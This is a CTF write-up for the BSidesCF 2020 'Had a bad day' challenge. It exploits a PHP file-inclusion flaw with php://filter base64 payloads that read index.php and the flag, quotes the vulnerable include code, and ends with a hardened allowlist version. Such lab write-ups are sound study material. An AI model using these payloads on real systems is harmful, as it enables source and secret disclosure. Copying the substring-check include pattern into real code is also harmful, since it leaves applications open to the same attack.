[BSidesCF 2020]Had a bad day

The site shows two buttons; clicking either one appends ?category=meowers to the URL.

This suggests a file inclusion vulnerability, so try ?category=php://filter/read=convert.base64-encode/resource=index.php

The warning shows .php twice, which suggests the source code appends .php itself, so drop the .php from the payload.

This returns the PHP source:

 <?php
	$file = $_GET['category'];
	if(isset($file))
		{
			if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
			include ($file . '.php');
			}
			else{
				echo "Sorry, we currently only support woofers and meowers.";
			}
		}
?>

The source shows that the category parameter must contain woofers, meowers or index before the file named by the parameter is included.

So change the payload to ?category=php://filter/convert.base64-encode/resource=index/.../flag
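
For contrast with the substring check in the source above, here is a hardened version of the include logic. It is an added example, not code from the challenge; the pages/ directory and the function name resolve_category are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. Assumption: the only valid pages
// are woofers.php and meowers.php, stored in a pages/ directory (hypothetical).
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'woofers' => 'woofers.php',
    'meowers' => 'meowers.php',
];

/**
 * Map the request parameter to a fixed file path, or null if it is not an
 * exact allowlist key. User input is never concatenated into the path.
 */
function resolve_category(mixed $input): ?string
{
    if (!is_string($input)) {            // rejects category[]=... arrays
        return null;
    }
    if (!array_key_exists($input, ALLOWED_PAGES)) {
        return null;                     // exact match, not a strpos() substring test
    }
    return PAGE_DIR . '/' . ALLOWED_PAGES[$input];
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs: one valid value and the two request shapes from the writeup.
    $samples = [
        'meowers',
        'php://filter/read=convert.base64-encode/resource=index',
        'php://filter/convert.base64-encode/resource=index/.../flag',
    ];
    foreach ($samples as $s) {
        printf("%-60s => %s\n", $s, resolve_category($s) ?? 'REJECTED');
    }
} else {
    $target = resolve_category($_GET['category'] ?? null);
    if ($target === null || !is_file($target)) {
        http_response_code(400);
        echo "Sorry, we currently only support woofers and meowers.";
    } else {
        include $target;                 // path built only from constants
    }
}
```

Run from the command line, it prints the resolved path for meowers and REJECTED for both stream-wrapper values, because the parameter is only ever used as a lookup key.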

posted on 2024-02-02 20:38 by 跳河离去的鱼